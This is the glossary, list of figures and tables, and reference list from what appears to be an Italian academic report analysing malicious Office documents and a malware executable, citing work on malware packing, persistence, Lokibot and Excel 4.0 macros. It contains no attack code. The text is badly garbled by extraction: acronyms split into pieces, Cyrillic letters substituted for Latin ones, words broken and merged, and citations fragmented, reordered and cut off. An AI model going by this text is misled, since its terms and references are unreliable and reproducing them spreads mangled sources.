F	TP	File Transfer Protocol. 3
Н	TTP	Hypertext Transfer Protocol. 3, 5
Н	ITTPS	Hypertext Transfer Protocol Secure. 3
H	•	Internet Protocol. 2, 4, 5
C	DL	Object Description Language. 2
C	LE	Object Linking and Embedding. 3, 6, 7
C	S	Operating System. 1
R	AM	Random Access Memory. 1
R	TF	Rich Text Format. 6
S	SH	Secure Shell Protocol. 3
T	CP	Transmission Control Protocol. 5
T	MP	Temporary file. 2
V	ΒA	Visual Basic for Applications. 4
V	M	Virtual Machine. 1, 3, 4, 7
X	LM	Excel Macro Language. 4
X	LS	Microsoft Excel Spreadsheet. 5
		List of Figures
1	Outp	out comando strings su file maldoc1.xls
		LIST OF TABLES
[esi azioni compiute dal file malware.exe 2 put exiftool maldoc1.xls
II	I Output exiftool maldoc1.xls	
III	Outp	out exiftool maldoc2.doc 6
		References
[1]	Packing	haran, T., Cohen, A., Gerson, N. and Nissim, N., 2022. File from the Malware Perspective: Techniques, Analysis Ap- s, and Directions for Enhancements. ACM Computing Surveys.
[2]	Gittins,	Z. and Soltys, M., 2020. Malware persistence mechanisms. a Computer Science, 176, pp.88-97.
[3]	Zhao, X Vulneral of Phys	., Huang, S., Pan, Z. and Hui, H., 2020, June. Buffer Overflow bility Detection Based on Unsafe Function Invocation. In Journal ics: Conference Series (Vol. 1549, No. 2, p. 022064). IOP
[4]	Publishi Mishra,	R., 2020. Cybersecurity & COVID 19.
	Ariani,	S.R. and Lumanto, R., Study of Lokibot Infection Against an Network.
[6]		m, J. and Ortolani, S., 2020. Evolution of Excel 4.0 Macro
[7]		

and communications security (pp. 809-820).[9] Carrera, E., 2007. x 5: Reverse engineering automation with python. Black Hat USA.

[8] Kammerstetter, M., Platzer, C. and Wondracek, G., 2012, October. Vanity, cracks and malware: Insights into the anti-copy protection ecosystem. In Proceedings of the 2012 ACM conference on Computer

licious Excel 4.0 Macros. In 2022 IEEE Symposium on Security and

Privacy (SP) (pp. 1534-1534). IEEE Computer Society.